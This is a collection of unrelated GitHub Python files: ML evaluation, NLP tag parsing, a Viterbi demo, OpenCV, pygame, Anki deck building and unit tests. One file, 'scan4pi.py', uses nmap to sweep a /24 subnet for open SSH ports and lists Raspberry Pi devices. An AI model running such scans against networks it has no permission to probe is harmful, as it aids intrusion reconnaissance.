num_leaf],dtype=np.int64)\nfor i in range(0,len(y_pred)):\n temp = np.arange(len(y_pred[0])) * num_leaf - 1 + np.array(y_pred[i])\n transformed_testing_matrix[i][temp] += 1\n\n#for i in range(0,len(y_pred)):\n#\tfor j in range(0,len(y_pred[i])):\n#\t\ttransformed_testing_matrix[i][j * num_leaf + y_pred[i][j]-1] = 1\n\nprint('Calculate feature importances...')\n# feature importances\nprint('Feature importances:', list(gbm.feature_importance()))\nprint('Feature importances:', list(gbm.feature_importance(\"gain\")))\n\n\n# Logestic Regression Start\nprint(\"Logestic Regression Start\")\n\n# load or create your dataset\nprint('Load data...')\n\n# c = np.array([1,0.5,0.1,0.05,0.01,0.005,0.001])\n# for t in range(0,len(c)):\nlm = LogisticRegression(penalty='l2', C=0.001) # logestic model construction\nlm.fit(transformed_training_matrix, np.ravel(y_train)) # fitting the data\n\n# y_pred_label = lm.predict(transformed_training_matrix ) # For training data\n# 逻辑回归的预测标签\ny_pred_label = lm.predict(transformed_testing_matrix) # For testing data\n# y_pred_est = lm.predict_proba(transformed_training_matrix) # Give the probabilty on each label\n# 逻辑回归的预测标签的概率\ny_pred_est = lm.predict_proba(transformed_testing_matrix)\n# Give the probabilty on each label\n\n#print('number of testing data is ' + str(len(y_pred_label)))\n#print(y_pred_est)\n\n# 评估方式1:\n# calculate predict accuracy\n# num = 0\n# for i in range(0,len(y_pred_label)):\n# if y_test[i] == y_pred_label[i]:\n# if y_train[i] == y_pred_label[i]:\n# num += 1\n# print(\"*******************\")\n# print(y_test)\n# print(y_pred_label)\n# print('penalty parameter is '+ str(c[t]))\n# print(\"prediction accuracy is \" + str((num)/len(y_pred_label)))\n#\n# df_prob = pd.DataFrame(\n# y_pred_est,\n# columns=['Death', 'Survived'])\n# fpr, tpr, thresholds = roc_curve(\n# y_test, df_prob['Survived'])\n# # find the area under the curve (auc) for the\n# # ROC\n# roc_auc = auc(fpr, tpr)\n# plt.title(\n# 'Receiver Operating Characteristic Curve')\n# plt.plot(fpr, tpr, 'black',\n# label='AUC = %0.2f' % roc_auc)\n# plt.legend(loc='lower right')\n# plt.plot([0, 1], [0, 1], 'r--')\n# plt.xlim([-0.1, 1.1])\n# plt.ylim([-0.1, 1.1])\n# plt.ylabel('True Positive Rate (TPR)')\n# plt.xlabel('False Positive Rate (FPR)')\n# plt.show()\n#\n# \t# Calculate the Normalized Cross-Entropy\n# \t# for testing data\n#\n# NE = (-1) / len(y_pred_est) * sum(((1+y_test)/2 * np.log(y_pred_est[:,1]) + (1-y_test)/2 * np.log(1 - y_pred_est[:,1])))\n# \t# for training data\n# # NE = (-1) / len(y_pred_est) * sum(((1+y_train)/2 * np.log(y_pred_est[:,1]) + (1-y_train)/2 * np.log(1 - y_pred_est[:,1])))\n# print(\"Normalized Cross Entropy \" + str(NE))\n\n#评估方式2:\n\nthresholds = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n\nplt.figure(figsize=(12, 8))\nj = 1\nfor i in thresholds:\n # print(\"y_pred_est\",y_pred_est)\n y_test_predictions_high_recall = y_pred_est[:, 1] > i\n plt.subplot(3, 3, j)\n j += 1\n\n cnf_matrix = confusion_matrix(y_test, y_test_predictions_high_recall)\n np.set_printoptions(precision=2)\n print(\"thresholds: \", i)\n print('Accurance: ',\n (cnf_matrix[0, 0] + cnf_matrix[1, 1])/(cnf_matrix[1, 0] + cnf_matrix[1, 1]+ cnf_matrix[0, 1]+ cnf_matrix[0, 0]))\n recall = cnf_matrix[1, 1] / (cnf_matrix[1, 0] + cnf_matrix[1, 1])\n print('Recall: ',recall)\n\n precision = cnf_matrix[1, 1] / (cnf_matrix[0, 1] + cnf_matrix[1, 1])\n print('Precision: ', precision)\n\n print('F1-score:',\n 2 * (precision * recall) / (precision + recall)\n )\n\n # 画出混淆矩阵\n class_names = [0, 1]\n\n # plot_confusion_matrix是一个自定义的绘制混淆矩阵图表的函数\n plot_confusion_matrix(cnf_matrix, classes=class_names, title='Threshold >= %s' % i)\nplt.show()\n#\n","repo_name":"octopustail/edu_predict","sub_path":"oversampling.py","file_name":"oversampling.py","file_ext":"py","file_size_in_byte":19699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5321382972","text":"import sys\nimport pickle\n\n\ndef parse_word_line(line):\n ''' parses word line to get POS and features '''\n\n line_parts = line.split('\\t', 5)\n pos, feature = line_parts[3: 5]\n data = [\n tuple(k_v.split('='))\n for k_v in feature.split('|')\n if k_v != '_' # `_` denotes absence according to Universal Dependencies\n ]\n data.append(('POS', pos))\n\n # check multiple keys of the same kind\n if len([x[0] for x in data]) > len(set(x[0] for x in data)):\n print('multiple keys in {}'.format(data))\n\n # return tuple of tuples (key, value) sorted by key\n return tuple(sorted(data, key=lambda x: x[0]))\n\n\ndef load_variations(src_path):\n # prepare all variations from vertical data\n variations = set()\n with open(src_path, 'r') as f:\n for line in f:\n if line.strip().startswith('<'): # skip lines with xml tags\n continue\n variations.add(parse_word_line(line))\n return list(variations)\n\n\nif __name__ == '__main__':\n try:\n src_path = sys.argv[1] if len(sys.argv) > 1 else 'vertikala_pdt'\n dest_path = sys.argv[2] if len(sys.argv) > 1 else 'tags_pdt'\n except KeyError:\n sys.exit('Missing source or destination file')\n\n print('Loading resource from {}...'.format(src_path))\n variations = load_variations(src_path)\n with open(dest_path, 'w') as f:\n pickle.dump(variations, f, protocol=2)\n print('...saved to {} ({} items)'.format(dest_path, len(variations)))\n","repo_name":"clarinsi/kontext","sub_path":"lib/plugins/default_taghelper/scripts/prepare_ud.py","file_name":"prepare_ud.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"43946969140","text":"pi = [1,0]\na = [[0.7,0.3],[0.5,0.5]]\nb = [[0.6,0.1,0.3],[0.1,0.7,0.2]]\nseq =[2,1,0]\n\nprob = pi\nstates=[]\n\nfor i in range(len(seq)):\n x = max(a[0][0]*prob[0]*b[0][seq[i]], a[1][0]*prob[1]*b[1][seq[i]])\n y = max(a[0][1]*prob[0]*b[0][seq[i]], a[1][1]*prob[1]*b[1][seq[i]])\n l=[]\n if a[0][0]*prob[0]*b[0][seq[i]] >= a[1][0]*prob[1]*b[1][seq[i]]:\n l.append(0)\n else:\n l.append(1)\n \n if a[0][1]*prob[0]*b[0][seq[i]] >= a[1][1]*prob[1]*b[1][seq[i]] :\n l.append(0)\n else:\n l.append(1)\n prob[0] = x\n prob[1] = y\n states.append(l)\nprint(states)\n\nseq=[]\nn=1\nl=[]\nif prob[0]>=prob[1]:\n print('The probability of given sequence is :',prob[0])\n n=0\nelse:\n print('The probability of given sequence is :',prob[1])\n n=1\nseq.insert(0,n)\nwhile states:\n l = states.pop(-1)\n seq.insert(0,l[n])\n n=l[n]\nprint('The best sequence is'+str(seq))\n#finalCode\n \n\n \n","repo_name":"Parasaran-addepalli/Viterbi-Algorithm-for-HMM","sub_path":"ViterbiAlgorithmHmm.py","file_name":"ViterbiAlgorithmHmm.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42334002022","text":"#encoding: utf-8\n'''\nCreate a font dataset for trainding\nContent / size / color(Font) / color(background) / style\nE.g. A / 64/ red / blue / arial\npotential : position (x, y) bold, rotation\n\n'''\nimport os\nimport pygame\n# wd2 = 'ad ah ai am an as at ba be by do ed ee em en er ex fe fu go ha he hi id if in is it ko la li ma me mm mu my na no of oh ok on oo op or os pa pi qi re so ta to uh um un up ur us vu we wo xi xu ye yo zo'\n# wd3 = 'the, and, for, are, but, not, you, all, any, can, had, her, was, one, our, out, day, get, has, him, his, how, man, new, now, old, see, two, way, who, boy, did, its, let, put, say, she, too, use'\nos.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n'''reference'''\n# color 10 (back ground and font)\n'''\nColors = {'red': (220, 20, 60), 'orange': (255,165,0), 'Yellow': (255,255,0), 'green': (0,128,0), 'cyan' : (0,255,255),\n 'blue': (0,0,255), 'purple': (128,0,128), 'pink': (255,192,203), 'chocolate': (210,105,30), 'silver': (192,192,192)}\n '''\nColors = {'red':(255,0,0), 'blue':(0,0,255),'green':(0,255,0)}\n# font_dir = '/home2/fonts_dataset_new'\nfont_dir = '/lab/tmpig23b/u/zhix/color3'\nif not os.path.exists(font_dir):\n os.makedirs(font_dir)\n\nimg_size = 128 \n\npygame.init()\nscreen = pygame.display.set_mode((img_size, img_size)) # image size Fix(128 * 128)\n\nfor back_color in Colors.keys(): # 4th round for back_color\n try:\n # 1 set back_color\n screen.fill(Colors[back_color]) # background color\n # 2 set letter\n \n # screen.blit(rtext, (img_size/2, img_size/2))\n # screen.blit(rtext, (img_size / 4, 0))\n # screen.blit(rtext, (10, 0)) # because\n # E.g. A / 64/ red / blue / arial\n img_name = back_color + \".png\"\n img_path = os.path.join(font_dir, back_color)\n if not os.path.exists(img_path):\n os.makedirs(img_path)\n pygame.image.save(screen, os.path.join(img_path, img_name))\n except:\n print(back_color)\n\n\n\n\n\n\n\n\n# screen.fill((255,255,255)) # background color\n# start, end = (97, 255) # 汉字编码范围\n# for codepoint in range(int(start), int(end)):\n# word = chr(codepoint)\n# font = pygame.font.SysFont(\"arial\", 64) # size and bold or not\n# # font = pygame.font.Font(\"msyh.ttc\", 64)\n# rtext = font.render(word, True, (0, 0, 0), (255, 255, 255))\n# # pygame.image.save(rtext, os.path.join(chinese_dir, word + \".png\"))\n# screen.blit(rtext, (300, 300))\n# pygame.image.save(screen, os.path.join(chinese_dir, word + \".png\"))\n","repo_name":"gyhandy/Fonts","sub_path":"pure_color/create_fonts_dataset.py","file_name":"create_fonts_dataset.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3101535700","text":"def get_lines(name_file):\n f = open(name_file)\n lines = f.readlines()\n f.close()\n return lines\n\n\ndef get_dict(lines):\n dct = {}\n for line in lines:\n lst = line.split('\\t')\n dct[int(lst[0])] = [lst[2], int(lst[3])]\n return dct\n\n\nlines = get_lines('table-1.txt')\ndct = get_dict(lines)\n\nlines = get_lines('table-2.txt') # читаем второй файл\n\nfor line in lines:\n arr = line.split('\\t')\n if dct[int(arr[0])][0] == 'Ж': # проверяем только Ж\n year1 = dct[int(arr[1])][1]\n year0 = dct[int(arr[0])][1]\n r = year1 - year0 # ищем разницу между возрастами\n if r > 22:\n print(r)","repo_name":"permCoding/elective-course-21","sub_path":"tasks/task03/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23217210529","text":"#try = block doubtful code\n#except = block handling code\n#raise = key word custom error throw\n#finally = block clean up processing\n\nnum1=int(input(\"enter no 1\"))\nnum2=int(input(\"enter no 2 \"))\n\ntry:\n res=num1/num2 # ee line il error varan chance unde divisible by 0 koduthal error varum athe konde ane try molil use chythe\n print(f\"result{res}\")\nexcept Exception as e: #ah error except ayi bakki thazhe ullthe print akan ane except use chythekkunnathe\n print(e)\n\nfinally: #vere line error ayalum ee thazhe ulla line print akum athine finally use cheyyam\n\n print(\"db transaction\")\n print(\"file operation\")\n\n","repo_name":"umesh567/mywork","sub_path":"Erorhandling/handling.py","file_name":"handling.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23749459311","text":"import nmap\n\n# Define the IP range to scan\nip_range = '192.168.1.1/24'\n\n# Initialize the nmap scanner\nnm = nmap.PortScanner()\n\n# Scan the network range\nnm.scan(hosts=ip_range, arguments='-p 22 --open')\n\n# Check the scan results for Raspberry Pi devices\nfor host in nm.all_hosts():\n if 'raspberry pi' in nm[host]['vendor'].lower():\n print(f\"Found Raspberry Pi at {host}\")\n","repo_name":"infinitydaemon/scriptkiddies","sub_path":"scan4pi.py","file_name":"scan4pi.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32369470157","text":"import sys\nsys.setrecursionlimit( 10 ** 6 )\n\nN = int( input() )\nAB = [ tuple( map( int, input().split() ) ) for _ in range( N - 1 ) ]\n\nconnect = [ [] for _ in range( N ) ]\nfor ( a, b ) in AB:\n connect[ a - 1 ].append( b - 1 )\n connect[ b - 1 ].append( a - 1 )\n\nfor i in range( N ):\n connect[ i ] = sorted( connect[ i ] )\n\nvisited = [ False for _ in range( N ) ]\nans = []\ndef dfs( v ):\n visited[ v ] = True\n ans.append( v + 1 )\n for u in connect[ v ]:\n if not visited[ u ]:\n dfs( u )\n ans.append( v + 1 )\n\ndfs( 0 )\nprint( \" \".join( map( str, ans ) ) )","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ABC/213/abc213-d.py","file_name":"abc213-d.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16798773598","text":"#https://stackoverflow.com/questions/33650974/opencv-python-read-specific-frame-using-videocapture?newreg=2495db9d80934aa3b199f6d8d7489f89\n#opencv for python3 => http://www.lfd.uci.edu/~gohlke/pythonlibs/\n#video guide : https://www.youtube.com/watch?v=ulJdZn0qBCQ\nimport matplotlib\nimport numpy as np\nimport cv2\n\n#Get video name from user\n#Ginen video name must be in quotes, e.g. \"pirkagia.avi\" or \"plaque.avi\"\nvideo_name = input(\"Please give the video name including its extension. E.g. \\\"pirkagia.avi\\\":\\n\")\n\n#Open the video file\ncap = cv2.VideoCapture(video_name)\n\n#Set frame_no in range 0.0-1.0\n#In this example we have a video of 30 seconds having 25 frames per seconds, thus we have 750 frames.\n#The examined frame must get a value from 0 to 749.\n#For more info about the video flags see here: https://stackoverflow.com/questions/11420748/setting-camera-parameters-in-opencv-python\n#Here we select the last frame as frame sequence=749. In case you want to select other frame change value 749.\n#BE CAREFUL! Each video has different time length and frame rate.\n#So make sure that you have the right parameters for the right video!\ntime_length = 30.0\nfps=25\nframe_seq = 749\nframe_no = (frame_seq /(time_length*fps))\n\n#The first argument of cap.set(), number 2 defines that parameter for setting the frame selection.\n#Number 2 defines flag CV_CAP_PROP_POS_FRAMES which is a 0-based index of the frame to be decoded/captured next.\n#The second argument defines the frame number in range 0.0-1.0\ncap.set(2,frame_no);\n\n#Read the next frame from the video. If you set frame 749 above then the code will return the last frame.\nret, frame = cap.read()\n\n#Set grayscale colorspace for the frame.\ngray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n#Cut the video extension to have the name of the video\nmy_video_name = video_name.split(\".\")[0]\n\n#Display the resulting frame\ncv2.imshow(my_video_name+' frame '+ str(frame_seq),gray)\n\n#Set waitKey\ncv2.waitKey()\n\n#Store this frame to an image\ncv2.imwrite(my_video_name+'_frame_'+str(frame_seq)+'.jpg',gray)\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n\n\n\n#Displaying a webcam feed using OpenCV and Python\n#https://stackoverflow.com/questions/2601194/displaying-a-webcam-feed-using-opencv-and-python\n\n#How do I access my webcam in Python?\n#https://stackoverflow.com/questions/604749/how-do-i-access-my-webcam-in-python\n\n#OPENCV Python 使用webcam錄影 http://opencv123.blogspot.tw/2015/07/opencv-python-webcam.html\n\n#Open Webcam using OpenCV on Python https://ccw1986.blogspot.tw/2015/07/opencvpython-open-webcam-using-opencv.html\n\n#OpenCV/Python: read specific frame using VideoCapture\n#https://stackoverflow.com/questions/33650974/opencv-python-read-specific-frame-using-videocapture?newreg=2495db9d80934aa3b199f6d8d7489f89\n\n#Install OpenCV 3 with Python 3 on Windows\n#https://www.solarianprogrammer.com/2016/09/17/install-opencv-3-with-python-3-on-windows/\n\ncv2.namedWindow(\"preview\")\nvc = cv2.VideoCapture(0)\n\nif vc.isOpened(): # try to get the first frame\n rval, frame = vc.read()\nelse:\n rval = False\n\nwhile rval:\n cv2.imshow(\"preview\", frame)\n rval, frame = vc.read()\n key = cv2.waitKey(20)\n if key == 27: # exit on ESC\n break\ncv2.destroyWindow(\"preview\")","repo_name":"kunhsien/PyExample","sub_path":"PyCV/py_opencv.py","file_name":"py_opencv.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33989347807","text":"import genanki\nimport json\nimport os\n\ndata = dict()\n\nif not os.path.isfile(\"notes.json\"):\n # Initialise\n data['tags'] = []\n data['notes'] = []\n with open('notes.json', 'w') as f:\n json.dump(data, f)\n\nelse:\n with open('notes.json',) as f:\n data = json.load(f)\n\nmy_model = genanki.Model(\n 1907366781, # DO NOT CHANGE THIS, WILL BREAK THE DECK\n 'Simple Model',\n fields=[\n {'name': 'engWord'},\n {'name': 'chiWord'},\n {'name': 'pinyin'},\n {'name': 'engEg1'},\n {'name': 'chiEg1'},\n {'name': 'engEg2'},\n {'name': 'chiEg2'},\n {'name': 'comments'},\n {'name': 'Guid'},\n ],\n templates=[\n {\n 'name': 'eng2chi',\n 'qfmt': '

{{engWord}}


Eg1: {{engEg1}}
Eg2 :{{engEg2}}
{{comments}}',\n 'afmt': '{{FrontSide}}

{{chiWord}}


{{pinyin}}
Eg1: {{chiEg1}}
Eg2 :{{chiEg2}}',\n },\n {\n 'name': 'chi2eng',\n 'qfmt': '

{{chiWord}}


{{pinyin}}
Eg1: {{chiEg1}}
Eg2 :{{chiEg2}}
{{comments}}',\n 'afmt': '{{BackSide}}

{{engWord}}


Eg1: {{engEg1}}
Eg2 :{{engEg2}}',\n }\n ])\n\nmy_deck = genanki.Deck(\n 1876378956, # DO NOT CHANGE THIS, WILL BREAK THE DECK!\n 'Tech Tingxie')\n\nfor note in data['notes']:\n field_vals = list(note.values())[:-1] # excludes tags\n my_note = genanki.Note(\n model=my_model,\n fields=field_vals,\n tags=note['tags'])\n my_deck.add_note(my_note)\n\ngenanki.Package(my_deck).write_to_file('tech-tingxie.apkg')\n","repo_name":"matthew5025/tech-tingxie","sub_path":"build_deck.py","file_name":"build_deck.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12446859235","text":"\"\"\"\nFront 3 - Slice Check Repeat Concatenate\n\nCreate a function that takes a string; we'll say that the front is the first three characters of the string.\nIf the string length is less than three characters, the front is whatever is there.\nReturn a new string, which is three copies of the front\n\"\"\"\n\ndef front3(string):\n new_string = string[0:3]\n print(new_string * 3)\n\n\nfront3(\"Python\")\nfront3(\"Cucumber\")\nfront3(\"bioshock\")\n","repo_name":"JRasta/python-functions","sub_path":"Skill-Development/Edabit/Very Easy/61 - 80/065 - concat_three_times.py","file_name":"065 - concat_three_times.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4595219986","text":"import requests\nimport json\n\nheaders = {\n \"Accept\": \"application/json\"\n}\n\ndef getData():\n with open('result.json', 'r') as fd :\n data = fd.readlines()\n\ndef main():\n data = getData()\n url = 'http://211.83.110.7:5000/detectresult'\n res = requests.post(url=url, headers=headers, data=json.dumps(data))\n print(res.content)\n\nif __name__ == '__main__':\n main()","repo_name":"CheUhxg/SDN-IPS","sub_path":"attack/detecter/sendResult.py","file_name":"sendResult.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31904256005","text":"\"\"\"\n Symmetric CART for Leafrank.\n\"\"\"\nfrom treerank.cart_splitter import CartSplitter\nfrom treerank.treerank_similarity import SimTreeRank\n\nfrom treerank.split_space.random_sym_features_splitter \\\n import RandomSymFeaturesSplitter\nfrom treerank.split_space.cross_sym_splitter import CrossSymSplitter\nfrom treerank.split_space.diag_sym_splitter import DiagSymSplitter\n\nclass CartSymSplitter(CartSplitter):\n r\"\"\"\n Implements the CartSplitter algorithm of [1].\n\n randomize_features is an integer.\n \"\"\"\n def __init__(self, fact_neg, fact_pos, depth, randomize_features=None):\n self._define_treerank(depth, randomize_features)\n super(CartSymSplitter, self).__init__(fact_neg, fact_pos, depth)\n\n def fit(self, X, y):\n \"\"\"\n Fits to the data.\n\n :param fact_neg: Weight on negative local density.\n :param fact_pos: Weight on positive local density.\n :param X: Position of each point.\n :param y: Binary class of the point, in {0,1}.\n\n :return: None.\n \"\"\"\n # Run TreeRank to obtain a partition of the space, with a full tree.\n self._treerank.fit_pairs(X, y)\n self._find_split_from_fitted_tree()\n\n def plot(self, region, *argv, **kwargs):\n \"\"\"Plots the region delimited by the splitter.\"\"\"\n raise Exception(\"TODO: Not yet implemented.\")\n\n def cut_region(self, region):\n \"\"\"Return the regions in and out when the splits cuts the region.\"\"\"\n raise Exception(\"TODO: Not yet implemented.\")\n\n # --------------- Private methods ---------------\n\n def _define_treerank(self, depth, randomize_features):\n # One can also use CrossSymSplitter here.\n if randomize_features is None:\n split_inst = DiagSymSplitter\n # CrossSymSplitter\n else:\n split_inst = lambda f_n, f_p: RandomSymFeaturesSplitter(\n DiagSymSplitter(f_n, f_p), randomize_features)\n # CrossSymSplitter\n self._treerank = SimTreeRank(split_inst, depth,\n change_emp_measure=False)\n","repo_name":"RobinVogel/On-Tree-based-methods-for-Similarity-Learning","sub_path":"treerank/cart_sym_splitter.py","file_name":"cart_sym_splitter.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"33960639960","text":"import io\nimport unittest\nfrom contextlib import redirect_stdout\nfrom unittest.mock import patch\n\n\nclass TestQ(unittest.TestCase):\n @patch('builtins.input', return_value='HACK 2')\n def test_case_0(self, input_mock=None):\n text_trap = io.StringIO()\n with redirect_stdout(text_trap):\n import solution\n self.assertEqual(text_trap.getvalue(),\n 'A\\n' +\n 'C\\n' +\n 'H\\n' +\n 'K\\n' +\n 'AC\\n' +\n 'AH\\n' +\n 'AK\\n' +\n 'CH\\n' +\n 'CK\\n' +\n 'HK\\n')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"HBinhCT/Q-project","sub_path":"hackerrank/Python/itertools.combinations()/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"16565841039","text":"import sys\nfrom PyQt5 import QtWidgets # pencere gibi özelliklerin olduğu kısmı dahil ettik\n\ndef Pencere():\n\n app = QtWidgets.QApplication(sys.argv) #uygulama oluşturmak istediğimizi belirttik\n \n pencere = QtWidgets.QWidget() # pencere oluşturma isteği, ğencere objemiz oluştu\n\n pencere.setWindowTitle(\"PyQt5 Ders 1\") # title koyduk\n\n pencere.show() # pencere göster\n\n sys.exit(app.exec_()) # uygulamanın sürekli çalışır durumda kalmasını sağlama\n\nPencere()\n\n#pencere oluşturma","repo_name":"ulerdogan/Programming-Practices","sub_path":"Python/learn-pyqt5/ders1.py","file_name":"ders1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"24208488975","text":"NoneType = 0\nIntType = 1\nFloatType = 2\nStringType = 3\nTupleType = 4\n_PackTupleType = 5\nBooleanType = 6\nCodeType = 8\n_PackCodeType = 9\nModuleType = 21\nClassType = 22\nFunctionType = 23\n_ClassInstanceType = 24\nNativeCodeType = 25\nForeignType = 26\nThreadType = 27\nMethodType = 29\nListType = 40\nDictType = 41\nXRangeType = 42\nSetType = 43\n_FrameType = 52\n_BlockType = 53\n_SegmentType = 54\n_SegListType = 55\n_SeqIterType = 56\n_ProfType = 63\n","repo_name":"rice-systems/embeddedpython","sub_path":"src/lib/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"18403065312","text":"#!/usr/bin/python3\n\"\"\"The test module for square.py\"\"\"\nfrom models.rectangle import Rectangle\nfrom models.square import Square\nimport unittest\nimport io\nimport sys\n\n\nclass TestSquareInstatiation(unittest.TestCase):\n \"\"\"Class for testing Square instantiation\"\"\"\n\n def test_instance_a(self):\n \"\"\"Tests if the id attribute is incrementing\"\"\"\n s1 = Square(1, 2, 3)\n s2 = Square(4, 3, 2)\n self.assertEqual(s1.id, s2.id - 1)\n\n def test_instance_with_id(self):\n \"\"\"Tests if the id attribute is set correctly\"\"\"\n s1 = Square(2, 3, 4, 5)\n self.assertEqual(s1.id, 5)\n\n def test_instance_b(self):\n \"\"\"Tests if exception is raised when no argument is provided\"\"\"\n with self.assertRaises(TypeError):\n Square()\n\n def test_instance_id(self):\n \"\"\"Tests if id can accept non-integer values\"\"\"\n s1 = Square(2, 3, 4, 'boy')\n self.assertEqual(s1.id, 'boy')\n\n def test_instance_from(self):\n \"\"\"Tests if square is an instance of Rectangle\"\"\"\n s1 = Square(3)\n self.assertIsInstance(s1, Rectangle)\n\n\nclass TestChangecase(unittest.TestCase):\n \"\"\"Class for testing attribute changes in Square class\"\"\"\n\n def test_update_x(self):\n \"\"\"Tests if x attribute is updated properly\"\"\"\n s1 = Square(1, 2, 4, 5)\n s1.x = 9\n self.assertEqual(s1.x, 9)\n\n def test_get_width_height(self):\n \"\"\"Tests if width and height attributes are equal\"\"\"\n s1 = Square(2)\n self.assertEqual(s1.width, s1.height)\n\n\nclass TestPrintSquare(unittest.TestCase):\n \"\"\"Class for testing str representation of Square class\"\"\"\n\n def test_width_height_only(self):\n \"\"\"Tests the str representation when only width and height are defined\"\"\"\n s1 = Square(2)\n s1.id = 4\n m = \"[Square] (4) 0/0 - 2\"\n self.assertEqual(m, str(s1))\n\n def test_all_define(self):\n \"\"\"Tests the str representation when all attributes are defined\"\"\"\n s1 = Square(4, 3, 2, 5)\n d = \"[Square] (5) 3/2 - 4\"\n self.assertEqual(d, s1.__str__())\n\n def test_x_or_y_change(self):\n \"\"\"Tests the str representation when x or y attributes are changed\"\"\"\n s1 = Square(4, 3, 2, 5)\n s1.x = 25\n d =\"[Square] (5) 25/2 - 4\"\n self.assertEqual(d, s1.__str__())\n\n\nclass TestSizeSetterGetter(unittest.TestCase):\n \"\"\"Class for testing getter and setter of size attribute\"\"\"\n\n def test_compare_height(self):\n \"\"\"Tests if size and height attributes are equal\"\"\"\n s1 = Square(4)\n self.assertEqual(s1.size, s1.height)\n\n def test_compare_width(self):\n \"\"\"Tests if size and width attributes are equal\"\"\"\n s1 = Square(4)\n self.assertEqual(s1.size, s1.width)\n\n def test_update_size_a(self):\n \"\"\"Tests if size attribute updates both height and width attributes\"\"\"\n s1 = Square(5)\n s1.size = 8\n self.assertEqual(s1.height, 8)\n self.assertEqual(s1.width, 8)\n self.assertEqual(s1.height, s1.width)\n self.assertEqual(s1.width, s1.size)\n\n def test_first_error(self):\n \"\"\"Tests if non-integer size value raises TypeError\"\"\"\n s2 = Square(7)\n with self.assertRaises(TypeError):\n s2.size ='boy'\n\n def test_second_error(self):\n \"\"\"Tests if negative size value raises ValueError\"\"\"\n s2 = Square(8)\n with self.assertRaises(ValueError):\n s2.size = -4\n\n\nclass TestSquare_stdout(unittest.TestCase):\n \"\"\"Class for testing standard output and update of Square class\"\"\"\n\n @staticmethod\n def capture_stdout(rect, value):\n \"\"\"Helper function to capture the stdout\"\"\"\n capture = io.StringIO()\n sys.stdout = capture\n if value == \"print\":\n print(rect)\n else:\n rect.display()\n sys.stdout = sys.__stdout__\n return (capture)\n\n def test_display_a(self):\n \"\"\"Tests the display method output\"\"\"\n s1 = Square(3)\n value = TestSquare_stdout.capture_stdout(s1, 'display')\n self.assertEqual('###\\n###\\n###\\n', value.getvalue())\n\n def test_display_b(self):\n \"\"\"Tests the display method output when size attribute changes\"\"\"\n s1 = Square(3)\n s1.size = 2\n value = TestSquare_stdout.capture_stdout(s1, 'display')\n self.assertEqual('##\\n##\\n', value.getvalue())\n\n def test_args_first(self):\n \"\"\"Tests the update method with positional arguments\"\"\"\n s1 = Square(4, 3, 2, 1)\n s1 = Square(4, 3, 2, 1)\n s1.update(4, 2, 3, 7)\n self.assertEqual(s1.area(), 4)\n self.assertEqual(s1.x, 3)\n self.assertEqual(s1.y, 7)\n self.assertEqual(s1.id, 4)\n\n def test_incomplete_args(self):\n s1 = Square(7)\n s1.update(3)\n self.assertEqual(s1.area(), 49)\n self.assertEqual(s1.x, s1.y)\n self.assertEqual(s1.id, 3)\n\n def test_arg_with_kwargs(self):\n s1 = Square(4)\n s1.update(7, 8, 9, 6, id = 20, size = 4, x = 2, y = 4)\n self.assertEqual(s1.area(), 64)\n self.assertEqual(s1.x, s1.y + 3)\n self.assertEqual(s1.id, 7)\n\n def test_kwargs_only(self):\n s1 = Square(7)\n s1.update(id = 20, size = 4, x = 2, y = 4)\n self.assertEqual(s1.area(), 16)\n self.assertEqual(s1.x, s1.y / 2)\n self.assertEqual(s1.id, 20)\n\n\nclass TestSquareToDict(unittest.TestCase):\n \"\"\"convert square to dict representation\"\"\"\n\n def test_dict_first(self):\n s1 = Square(2, 3, 4, 5)\n m = {'id': 5, 'x': 3, 'size': 2, 'y': 4}\n self.assertEqual(s1.to_dictionary(), m)\n\n def test_dict_second(self):\n s1 = Square(2)\n s1.update(3, 4, 5, 6)\n m = {'id': 3, 'x': 5, 'size': 4, 'y': 6}\n self.assertEqual(s1.to_dictionary(), 